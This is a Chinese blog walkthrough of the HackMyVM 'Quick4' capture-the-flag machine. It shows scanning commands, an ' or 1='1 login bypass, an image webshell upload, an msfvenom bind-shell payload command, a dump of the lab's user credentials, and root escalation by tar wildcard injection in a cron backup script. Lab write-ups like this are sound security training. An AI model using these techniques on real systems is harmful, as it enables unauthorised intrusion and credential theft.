quick4 - hackmyvm

最新推荐文章于 2024-07-17 20:44:53 发布
最新推荐文章于 2024-07-17 20:44:53 发布
阅读量285 收藏 6
点赞数 4
分类专栏: hackmyvm靶场合集 文章标签: 安全 网络安全 linux 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/139563563
版权

简介

靶机名称:quick4

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick4

本地环境

虚拟机:vitual box

靶场IP(quick4):192.168.56.104

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

nmap起手

nmap -sT --min-rate 10000 -p0- 192.168.56.104 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;

经典22和80端口

image-20240608160759229

tcp细扫

nmap -sT -sV -sC -O -p$ports 192.168.56.104 -oA nmapscan/detail

image-20240608161346219

得知有个/admin/路径

HTTP

gobuster扫描路径,发现有一个/employee

gobuster dir -u http://192.168.56.104 -w $HVV_PATH/8_dict/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -b 400-404 -t 10 -x php,zip,bak,jpg,png,mp4,mkv,txt,html

image-20240609132900449

image-20240609132933155

尝试了几轮,发现用任意邮箱和万能密码' or 1='1就可以直接进入后台……

image-20240609133138821

在修改密码界面可以获取密码为gOkRYKGwN57my7bNN2

image-20240609133211716

人员管理界面给随便一个人上传图片马,顺便把密码也改了

image-20240609140408948

image-20240609140424209

退出,登陆该用户的账号后就能发现头像已经是我们的马了

image-20240609141306068

蚁剑连接成功

image-20240609141418463

升级shell

尝试了好久,反弹shell怎样也回不来……简单靶机也懒得重启排查了,直接上传个bind马连上去就好了

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=9002 -f elf > msf

image-20240609144015973

在/home目录下找到user.txt

image-20240609144127516

HMV{7920c4596aad1b9826721f4cf7ca3bf0}

提权

信息收集

在/var/www/html/employee目录下的admin.php文件中找到数据库配置文件

image-20240609145114063

fastandquicktobefaster

成功登入mysql,得到账密信息(但是没卵用)

mysql> select * from users;
select * from users;
+----+-----------------------------------+-----------------+--------------------+----------+----------------------+
| id | email                             | name            | password           | role     | profile_picture      |
+----+-----------------------------------+-----------------+--------------------+----------+----------------------+
|  1 | info@quick.hmv                    | Quick           | Qe62W064sgRTdxAEpr | admin    | uploads/1_admin.png  |
|  2 | nick.greenhorn@quick.hmv          | Nick Greenhorn  | C3ho049g4kwxTxuSUA | employee | uploads/2_2.jpg      |
|  3 | andrew.speed@quick.hmv            | Andrew Speed    | o30VfVgts73ibSboUP | employee | uploads/3_andrew.jpg |
|  4 | jack.black@email.hmv              | Jack Black      | 1Wd35lRnAKMGMEwcsX | customer |                      |
|  5 | mike.cooper@quick.hmv             | Mike Cooper     | Rh978db3URen64yaPP | employee | uploads/5_mike.jpg   |
|  6 | j.doe@email.hmv                   | John Doe        | 0i3a8KyWS2IcbmqF02 | customer |                      |
|  7 | jane_smith@email.hmv              | Jane Smith      | pL2a92Po2ykXytzX7y | customer |                      |
|  8 | frank@email.hmv                   | Frank Stein     | 155HseB7sQzIpE2dIG | customer |                      |
|  9 | fred.flinstone@email.hmv          | Fred Flinstone  | qM51130xeGHHxKZWqk | customer |                      |
| 10 | s.hutson@email.hmv                | Sandra Hutson   | sF217VruHNj6wbjofU | customer |                      |
| 11 | b.clintwood@email.hmv             | Bill Clintwood  | 2yLw53N0m08OhFyBXx | customer |                      |
| 12 | j.bond@email.hmv                  | James Bond      | 7wS93MQPiVQUkqfQ5T | customer |                      |
| 13 | d.trumpet@email.hmv               | Donald Trumpet  | f64KBw7cGvu1BkVwcb | customer |                      |
| 14 | m.monroe@email.hmv                | Michelle Monroe | f64KBw7cGvu1BkVwcb | customer |                      |
| 15 | jeff.anderson@quick.hmv           | Jeff Anderson   | 5dX3g8hnKo7AFNHXTV | employee | uploads/15_jeff.jpg  |
| 16 | lee.ka-shingn@quick.hmv@quick.hmv | Lee Ka-shing    | am636X6Rh1u6S8WNr4 | employee | uploads/16_lee.jpg   |
| 17 | laura.johnson@email.hmv           | Laura Johnson   | 95T3OmjOV3gublmR7Z | customer |                      |
| 18 | coos.busters@quick.hmv            | Coos Busters    | f1CD3u3XVo0uXumGah | employee | uploads/18_coos.jpg  |
| 19 | n.down@email.hmv                  | Neil Down       | Lj9Wr562vqNuLlkTr0 | customer |                      |
| 20 | t.green@email.hmv                 | Teresa Green    | 7zQ19L0HhFsivH3zFi | customer |                      |
| 21 | k.ball@email.hmv                  | Krystal Ball    | k1TI68MmYu8uQHhfS1 | customer |                      |
| 22 | juan.mecanico@quick.hmv           | Juan Mecnico   | 5a34pXYDAOUMZCoPrg | employee | uploads/22_juan.jpg  |
| 23 | john.smith@quick.hmv              | John Smith      | 5Wqio90BLd7i4oBMXJ | employee | uploads/23_john.jpg  |
| 24 | misty.cupp@email.hmv              | Misty Cupp      | c1P35bcdw0mF3ExJXG | customer |                      |
| 25 | lara.johnson@quick.hmv            | Lara Johnson    | 123                | employee | uploads/25_2.php     |
| 26 | j.daniels@email.hmv               | James Daniels   | yF891teFhjhj0Rg7ds | customer |                      |
| 27 | dick_swett@email.hmv              | Dick Swett      | y6KA4378EbK0ePv5XN | customer |                      |
| 28 | a.lucky@email.hmv                 | Anna Lucky      | c1P35bcdw0mF3ExJXG | customer |                      |
| 29 | 123@qq.com                        | 123             | 123                | customer |                      |
+----+-----------------------------------+-----------------+--------------------+----------+----------------------+
29 rows in set (0.00 sec)

然后祭出linpeas,发现有backup.sh

image-20240609151631366

#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *

定时任务

定时任务里面也有相关任务

image-20240609151941299

gtfobins上有写怎么利用,因为*会把文件名当成参数读入,所以直接在/var/www/html/像下面这样构造即可

image-20240609164425078

image-20240609164838669

然后就能弹到shell了

image-20240609164920973

提权成功,root用户目录下找到flag

HMV{858d77929683357d07237ef3e3604597}

古明地核
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QuickLook-3.6.11.msi
06-09
QuickLook-3.6.11.msi
QuickLinks-main.zip
10-02
《快速链接QuickLinks详解》 在信息技术领域,高效的工作流程是关键。"QuickLinks"作为一个标签,通常代表着一种为了提高用户工作效率,简化操作步骤而设计的功能或应用。在这个名为"QuickLinks-main.zip"的压缩包...
Quick3 - hackmyvm
tanbinn的博客
02-20 362
难度:简单靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Quick2 - HackMyVM
tanbinn的博客
02-19 387
hackmyvmquick2靶场
Adria - hackmyvm
tanbinn的博客
03-03 972
hackmyvm的adria靶场
Quick3 - hackmyvm,2024年BATJ30套大厂网络安全经典高频面试题
m0_61330806的博客
04-06 849
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Quick3 - hackmyvm网络安全布局优化之include、merge、ViewStub的使用
m0_60666921的博客
04-08 624
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!点击主页右上角的"make appointment",即可进入一个登陆界面。不存在LFI,路径爆破也没有有价值的东西。,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了。用这种方式可以获取所有用户的密码。点击右上角的"My Profile"进入个人页面。print (“URL地址为:”, r.url)
hackmyvmQuick2靶机
woshicainiao666的博客
04-23 479
发现文件包含漏洞(但不能访问日志文件),有用的用户名(不知道密码),返回页面,看看还有什么,没有注意到的点这里有一个联系方式,试试ssh连接,不行,然后我又使用hydra爆破了,没有成功不行,发现不了其他的漏洞,只能使用工具扫描。
hackmyvm———Quick4之tar命令注入
m0_63641882的博客
03-31 920
1.信息收集2.万能密码登录3.文件上传漏洞利用4.tar命令注入提权后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!!
[HackMyVm] Quick
qq_34942239的博客
03-12 456
测试发现123@qq.com 和123@qq.com'#结果相同,123@qq.com'报错,说明存在sql注入。根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这。发现比前几个quick系列多出来了employee目录。字段就dump了几条没发现有用的东西,密码也登不上。但是登录界面可以用万能密码登上去。home目录下有user.txt。添加一个GIF的文件头上传成功。前面的数字试到2找到了文件位置。sqlmap跑一下请求包。上传一句话木马时候提示。在查看进程的时候发现。
[HackMyVM] Quick
qq_34942239的博客
03-17 306
测试发现url可以RFI,注意把文件末尾的.php去掉,因为该网站会自动添加.php。找到SUID权限发现php7有suid权限。现在可以直接拿到userflag。
electron-quick-start-master 快速入门教程
05-31
electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程...
QuickLook-3.6.5.zip
03-17
QuickLook是一款适用于Windows操作系统的快速预览工具,其灵感来源于苹果Mac OS X系统中的同名功能。QuickLook 3.6.5是该软件的特定版本,提供了对各种文件类型的预览支持,使得用户无需打开文件就能查看其内容,极...
quickfix-1.15.1-cp38-cp38-win32
08-19
quickfix-1.15.1-cp38-cp38-win32
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 459
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 789
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 556
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
最新发布
代码其实很简单
07-17 630
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
quicklook-3.6.11.msi
07-15
### 回答1: quicklook-3.6.11.msi是一种安装文件,用于安装QuickLook软件的版本3.6.11。QuickLook是一款用于Windows操作系统的实用工具,它允许用户在不打开文件的情况下快速预览文件内容。 该安装文件通常以.msi文件格式提供,这是Windows Installer的一种标准安装包格式。用户可以通过双击安装文件开始安装过程。安装过程可能需要用户确认许可协议并选择安装位置。 安装完成后,用户可以在桌面或任务栏中找到QuickLook的图标。当用户需要预览文件时,只需选中文件,按下空格键或单击鼠标右键并选择“QuickLook”选项即可。QuickLook将会在一个小窗口中显示文件的内容,包括文本、图像、音频、视频等。用户可以使用鼠标滚轮或方向键浏览文件内容,还可以调整预览窗口的大小。 通过使用QuickLook,用户可以更加高效地浏览文件内容,无需打开包括Office文档、PDF、图片、音视频等各种类型文件的相关应用程序。这不仅节省了时间,还避免了不必要的文件打开和关闭操作。 总而言之,quicklook-3.6.11.msi是用于安装QuickLook软件版本3.6.11的安装文件,该软件可以帮助用户在Windows操作系统上快速预览各种类型的文件内容,提高工作效率。 ### 回答2: quicklook-3.6.11.msi 是一款安装程序,用于安装QuickLook软件的版本号为3.6.11。QuickLook是一款在Windows系统上功能强大的预览工具,可以帮助用户快速预览各种文件,包括文本文档、图片、音频、视频等。 通过安装quicklook-3.6.11.msi,用户可以在文件资源管理器中直接使用快捷键进行文件预览,无需打开对应的应用程序。这种快速预览的功能大大提高了用户的工作效率,特别是在需要查看大量文件的情况下。 此外,quicklook-3.6.11.msi 的安装过程相对简单,只需下载并运行该安装程序,按照提示进行安装即可。安装完成后,用户可以根据自己的需求进行设置,选择需要预览的文件类型,并自定义快捷键等。 总的来说,quicklook-3.6.11.msi 是一款方便实用的预览工具安装程序,用户可以通过安装该程序,快速预览各种文件,提高工作效率。 ### 回答3: quicklook-3.6.11.msi是一个Windows安装程序,用于安装QuickLook软件的版本3.6.11。QuickLook是一个轻量级的文件预览工具,可以在不打开文件的情况下快速查看文件的内容。该软件支持预览多种文件类型,包括文本文件、图片、音频、视频和压缩文件等。使用QuickLook可以在不打开文件的情况下预览文件内容,方便用户快速浏览文件,节省时间和提高工作效率。 通过安装quicklook-3.6.11.msi,用户可以将QuickLook软件添加到自己的Windows操作系统中。安装过程通常很简单,只需双击运行.msi文件,按照安装向导的指示进行操作即可完成安装。一旦安装完成,用户可以通过右键单击文件,在弹出的菜单中选择QuickLook选项来预览文件。使用QuickLook可以快速预览多种文件类型,无需打开相应的程序,省去了打开文件的时间和麻烦。 除了基本的文件预览功能,QuickLook还提供了一些其他的实用功能,如复制文件路径、打开文件所在的文件夹等。用户可以通过设置界面对QuickLook进行自定义配置,如调整预览窗口的大小和位置,选择预览文件的方式等。 总之,quicklook-3.6.11.msi是安装QuickLook软件的安装程序,安装完成后可以在Windows系统中使用QuickLook快速预览多种文件类型的内容,提高工作效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值